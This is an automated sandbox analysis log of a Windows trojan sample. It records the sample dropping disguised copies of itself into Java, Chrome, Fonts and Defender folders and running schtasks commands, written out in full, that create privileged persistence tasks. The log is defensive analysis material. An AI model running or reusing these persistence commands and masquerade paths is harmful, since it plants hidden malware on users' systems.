Source: ppXCre3i9k.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: ppXCre3i9k.exe, wumGypTcx1DdRpvlrPH.cs Cryptographic APIs: 'CreateDecryptor'
Source: ppXCre3i9k.exe, wumGypTcx1DdRpvlrPH.cs Cryptographic APIs: 'CreateDecryptor'
Source: ppXCre3i9k.exe, Kv1ywN7RvIY4uxVRu8L.cs Cryptographic APIs: 'TransformBlock'
Source: ppXCre3i9k.exe, Kv1ywN7RvIY4uxVRu8L.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.evad.winEXE@30/40@1/1
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Program Files (x86)\common files\Java\Java Update\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Users\user\Music\XYIphamTjljSgoBQQlfKpXxgNOIO.exe Jump to behavior
Source: C:\Users\user\3D Objects\services.exe Mutant created: NULL
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\553268716508216316798d4c7b21f247401aea9a
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6892:120:WilError_03
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File created: C:\Users\user\AppData\Local\Temp\BvJvv2D5VS Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5v7z9xH3I0.bat"
Source: ppXCre3i9k.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ppXCre3i9k.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: ppXCre3i9k.exe ReversingLabs: Detection: 81%
Source: ppXCre3i9k.exe Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\ppXCre3i9k.exe File read: C:\Users\user\Desktop\ppXCre3i9k.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\ppXCre3i9k.exe "C:\Users\user\Desktop\ppXCre3i9k.exe"
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XYIphamTjljSgoBQQlfKpXxgNOIOX" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\common files\Java\Java Update\XYIphamTjljSgoBQQlfKpXxgNOIO.exe'" /f
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XYIphamTjljSgoBQQlfKpXxgNOIO" /sc ONLOGON /tr "'C:\Program Files (x86)\common files\Java\Java Update\XYIphamTjljSgoBQQlfKpXxgNOIO.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XYIphamTjljSgoBQQlfKpXxgNOIOX" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\Java\Java Update\XYIphamTjljSgoBQQlfKpXxgNOIO.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XYIphamTjljSgoBQQlfKpXxgNOIOX" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Media Player\Skins\XYIphamTjljSgoBQQlfKpXxgNOIO.exe'" /f
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XYIphamTjljSgoBQQlfKpXxgNOIO" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\Skins\XYIphamTjljSgoBQQlfKpXxgNOIO.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XYIphamTjljSgoBQQlfKpXxgNOIOX" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Media Player\Skins\XYIphamTjljSgoBQQlfKpXxgNOIO.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XYIphamTjljSgoBQQlfKpXxgNOIOX" /sc MINUTE /mo 10 /tr "'C:\Program Files\Google\Chrome\Application\SetupMetrics\XYIphamTjljSgoBQQlfKpXxgNOIO.exe'" /f
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\MoUsoCoreWorker.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\MoUsoCoreWorker.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XYIphamTjljSgoBQQlfKpXxgNOIOX" /sc MINUTE /mo 6 /tr "'C:\Program Files\Google\Chrome\Application\XYIphamTjljSgoBQQlfKpXxgNOIO.exe'" /f
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XYIphamTjljSgoBQQlfKpXxgNOIO" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\XYIphamTjljSgoBQQlfKpXxgNOIO.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XYIphamTjljSgoBQQlfKpXxgNOIOX" /sc MINUTE /mo 8 /tr "'C:\Program Files\Google\Chrome\Application\XYIphamTjljSgoBQQlfKpXxgNOIO.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XYIphamTjljSgoBQQlfKpXxgNOIOX" /sc MINUTE /mo 14 /tr "'C:\Windows\Fonts\XYIphamTjljSgoBQQlfKpXxgNOIO.exe'" /f
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XYIphamTjljSgoBQQlfKpXxgNOIO" /sc ONLOGON /tr "'C:\Windows\Fonts\XYIphamTjljSgoBQQlfKpXxgNOIO.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 9 /tr "'C:\Users\Default\Start Menu\Programs\MoUsoCoreWorker.exe'" /f
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Users\Default\Start Menu\Programs\MoUsoCoreWorker.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Start Menu\Programs\MoUsoCoreWorker.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Users\user\3D Objects\services.exe'" /f
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5v7z9xH3I0.bat"
Source: unknown Process created: C:\ProgramData\USOShared\Logs\dllhost.exe "C:\Users\All Users\USOShared\Logs\dllhost.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown Process created: C:\ProgramData\USOShared\Logs\dllhost.exe "C:\Users\All Users\USOShared\Logs\dllhost.exe"
Source: unknown Process created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe "C:\Users\Default\Start Menu\Programs\MoUsoCoreWorker.exe"
Source: unknown Process created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MoUsoCoreWorker.exe "C:\Users\Default\Start Menu\Programs\MoUsoCoreWorker.exe"
Source: unknown Process created: C:\Users\user\3D Objects\services.exe "C:\Users\user\3D Objects\services.exe"
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5v7z9xH3I0.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\ppXCre3i9k.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: version.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\ProgramData\USOShared\Logs\dllhost.exe Section loaded: wldp.dll Jump to behavior
